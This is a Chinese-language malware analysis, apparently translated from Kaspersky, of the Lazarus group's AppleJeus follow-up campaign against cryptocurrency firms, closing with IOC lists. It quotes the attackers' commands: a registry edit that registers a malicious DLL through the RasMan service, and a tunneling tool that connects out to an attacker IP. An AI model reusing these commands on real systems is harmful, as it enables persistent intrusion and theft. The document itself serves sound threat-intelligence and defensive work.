Lazarus组织是目前最活跃的APT组织之一。 2018年,卡巴斯基针发现由该组织发起的名为AppleJeus的攻击行动。该行动是Lazarus首次针对macOS用户的攻击,为了攻击macOS用户,Lazarus开发了macOS恶意软件并添加身份验证机制,其可以非常仔细谨慎的下载后一阶段的有效负载,并在不落盘的情况下加载下一阶段的有效负载。为了攻击Windows用户,他们制定了多阶段感染程序。在“ AppleJeus”行动分析发布后,Lazarus在进行攻击时变得更加谨慎,采用了更多多方法来避免被发现。
AppleJeus后续
发布AppleJeus行动分析后,Lazarus继续使用类似的作案手法来破坏加密货币业务,研究人员发现了更多与AppleJeus中的macOS恶意软件类似的恶意软件。 该macOS恶意软件使用公共代码来开发安装程序。 恶意软件使用了Centrabit开发的QtBitcoinTrader。
这三个macOS安装程序使用相似的后安装程序脚本植入有效负载,并在执行获取的第二阶段有效负载时使用相同的命令。此外还识别出的另一类型macOS恶意软件MarkMakingBot.dmg(be37637d8f6c1fbe7f3ffc702afdfe1d),该恶意软件创建于2019-03-12,但网络通信并未加密,推测这是macOS恶意软件改造升级的中间阶段。
Windows恶意软件的变化
持续跟踪此活动中发现一名受害者在2019年3月受到Windows AppleJeus恶意软件的攻击。确定感染始于名为WFCUpdater.exe的恶意文件,攻击者使用了一个假网站:wfcwallet [.] com。
攻击者像以前一样使用了多阶段感染,但是方法发生了变化。 感染始于.NET恶意软件,其被伪装成WFC钱包更新程序(a9e960948fdac81579d3b752e49aceda)。此.NET文件执行后会检查命令行参数是否为“ / Embedding”。 该恶意软件负责使用硬编码的20字节XOR密钥(82 d7 ae 9b 36 7d fc ee 41 65 8f fa 74 cd 2c 62 b7 59 f5 62)解密同一文件夹中的WFC.cfg文件。其后连接到C2服务器:
wfcwallet.com (resolved ip: 108.174.195.134)
www.chainfun365.com(resolved ip: 23.254.217.53)
之后会执行攻击者的命令,安装下一阶段的有效负载。 攻击者将两个文件放置到受害者系统文件夹中:rasext.dll和msctfp.dat。他们使用RasMan(远程访问连接管理器)Windows服务注册下一阶段有效负载。 经过基本侦察后,攻击者使用以下命令手动植入有效载荷:
cmd.exe /c dir rasext.dll
cmd.exe /c dir msctfp.dat
cmd.exe /c tasklist /svc | findstr RasMan
cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\RasMan\ThirdParty /v DllName /d rasext.dll /f
为了建立远程隧道,攻击者使用命令行参数植入了更多的相关工具,但研究人员没有获得更多的工具文件。
Port opener:
%APPDATA%\Lenovo\devicecenter\Device.exe 6378
Tunneling tool:
%APPDATA%\Lenovo\devicecenter\CenterUpdater.exe 127.0.0.1 6378 104.168.167.16 443
macOS恶意软件变化
JMTTrading
在跟踪此攻击活动时发现了macOS恶意软件变体。攻击者将其假网站和应用程序称为JMTTrading,其他研究人员和安全厂商也发布了其大量技术细节。在这里强调一下这次攻击的不同之处。
攻击者使用GitHub来托管其恶意应用程序。
恶意软件作者在其macOS恶意软件中使用了Object-C而不是QT框架。
该恶意软件在macOS可执行文件中实现了简单的后门功能。
与以前的情况类似,使用16字节XOR密钥加密/解密的恶意软件。
Windows版本的恶意软件使用了ADVobfuscator来隐藏其代码。
macOS恶意软件的安装脚本与以前的版本有显着差异。
UnionCryptoTrader
还确定了另一项针对macOS的攻击。恶意程序名为UnionCryptoTrader,安全研究员 dineshdina04发现了一个相同的案例,该攻击总结如下:
安装脚本与JMTTrading使用的脚本相同。
恶意软件作者使用SWIFT开发了此macOS恶意软件。
恶意软件作者更改了从收集信息的方法。
该恶意软件开始使用auth_signature和auth_timestamp参数进行身份验证,以便传递第二阶段有效负载。
该恶意软件无需落盘即可加载下一阶段的有效负载。
Windows版本的UnionCryptoTrader
研究人员找到了Windows版本的UnionCryptoTrader(0f03ec3487578cef2398b5b732631fec)。它是从Telegram Messenger下载并执行:
C:\Users\[user name]\Downloads\Telegram Desktop\UnionCryptoTraderSetup.exe
此外在假网站上找到了攻击者的Telegram,可以高度确认攻击者使用Telegram Messenger发送安装程序。由于有效负载仅在内存中执行,因此无法获取所有相关文件。 整个感染过程与WFCWallet非常相似,但是增加了注入过程。
Windows版本的UnionCryptoTrader具有以下窗口,显示几个加密货币的价格图表。
Windows版本的UnionCryptoTrader更新程序(629b9de3e4b84b4a0aa605a3e9471b31)与macOS版本功能相似。 根据构建路径(Z:\Loader\x64\Release\WinloaderExe.pdb),恶意软件作者将此恶意软件称为加载程序。 启动后,该恶意软件会检索受害者的基本信息,并以HTTP POST发送该信息。
如果C2服务器的响应为200,则恶意软件会解密有效负载并将其加载到内存中。最后恶意软件发送act=done。从此加载程序下载的下一阶段有效负载(e1953fa319cc11c2f003ad0542bca822)与WFCWallet的.NET下载程序相似。该恶意软件负责解密同一文件夹中的Adobe.icx文件,将下一个有效负载注入Internet Explorer进程,并执行攻击者的命令。
最终的有效载荷(dd03c6eb62c9bf9adaf831f1d7adcbab)与WFCWallet相同是通过手动植入的。恶意软件作者根据先前收集的信息植入仅在特定系统上有效的恶意软件。该恶意软件会检查受感染系统的信息,并将其与给定值进行比较。
Windows恶意软件将加密的msctfp.dat文件加载到系统文件夹中,并加载每个配置。 它根据该文件的内容执行附加命令。当恶意软件与C2服务器通信时会使用预定义标头的POST请求。
初始通信恶意软件首先发送参数:
cgu:来自配置的64bits十六进制值
aip:配置中的MD5哈希值
sv:硬编码值
如果来自C2服务器的响应为200,恶意软件会发送带有加密数据和随机值的下一个POST请求,攻击者使用随机值来识别每个受害者并验证POST请求。
imp:随机产生的值
dsh:imp的异或值
hb_tp:imp的异或值(key:0x67BF32)
hb_dl:加密的数据发送到C2服务器
ct:硬编码值
最后,恶意软件下载下一阶段的有效负载,对其进行解密。
此外在调查其基础架构时发现了几个仍在线的假冒网站。
总结
AppleJeus后续行动中找到几名受害者分布在英国,波兰,俄罗斯和中国,一些受害者与加密货币业务有关。
攻击者改变了macOS和Windows恶意软件,在macOS下载器中添加了身份验证机制并更改了macOS开发框架。 Windows系统中的感染过程与以前的不同。Lazarus组织为获取经济利益而进行攻击会一直持续。
IOCs
macOS恶意软件哈希
c2ffbf7f2f98c73b98198b4937119a18 MacInstaller.dmg
8b4c532f10603a8e199aa4281384764e BitcoinTrader.pkg
bb04d77bda3ae9c9c3b6347f7aef19ac .loader
3efeccfc6daf0bf99dcb36f247364052 4_5983241673595946132.dmg
cb56955b70c87767dee81e23503086c3 WbBot.pkg
b63e8d4277b190e2e3f5236f07f89eee .loader
be37637d8f6c1fbe7f3ffc702afdfe1d MarkMakingBot.dmg
bb66ab2db0bad88ac6b829085164cbbb BitcoinTrader.pkg
267a64ed23336b4a3315550c74803611 .loader
6588d262529dc372c400bef8478c2eec UnionCryptoTrader.dmg
55ec67fa6572e65eae822c0b90dc8216 UnionCryptoTrader.pkg
da17802bc8d3eca26b7752e93f33034b .unioncryptoupdater
39cdf04be2ed479e0b4489ff37f95bbe JMTTrader_Mac.dmg
e35b15b2c8bb9eda8bc4021accf7038d JMTTrader.pkg
6058368894f25b7bc8dd53d3a82d9146 .CrashReporter
Windows恶意软件哈希
a9e960948fdac81579d3b752e49aceda WFCUpdater.exe
24B3614D5C5E53E40B42B4E057001770 UnionCryptoTraderSetup.exe
629B9DE3E4B84B4A0AA605A3E9471B31 UnionCryptoUpdater.exe
E1953FA319CC11C2F003AD0542BCA822 AdobeUpdator.exe, AdobeARM.exe
f221349437f2f6707ecb2a75c3f39145 rasext.dll
055829E7600DBDAE9F381F83F8E4FF36 UnionCryptoTraderSetup.exe
F051A18F79736799AC66F4EF7B28594B Unistore.exe
文件路径
%SYSTEM%\system32\rasext.dll
%SYSTEM%\system32\msctfp.dat
%APPDATA%\Lenovo\devicecenter\Device.exe
%APPDATA%\Lenovo\devicecenter\CenterUpdater.exe
%APPDATA%\Local\unioncryptotrader\UnionCryptoUpdater.exe
$APPDATA%\adobe\AdobeUpdator.exe
C:\Programdata\adobe\adobeupdator.exe
%AppData%\Local\Comms\Unistore.exe
域名
cyptian.com
beastgoc.com
wfcwallet.com
chainfun365.com
invesuccess.com
private-kurier.com
aeroplans.info
mydealoman.com
unioncrypto.vip
IP
104.168.167.16
23.254.217.53
185.243.115.17
104.168.218.42
95.213.232.170
108.174.195.134
185.228.83.32
172.81.135.194
URLs
https://www.wb-bot[.]org/certpkg.php
http://95.213.232[.]170/ProbActive/index.do
http://beastgoc[.]com/grepmonux.php
https://unioncrypto[.]vip/update
*参考来源:kaspersky,由Kriston编译,转载请注明来自FreeBuf.COM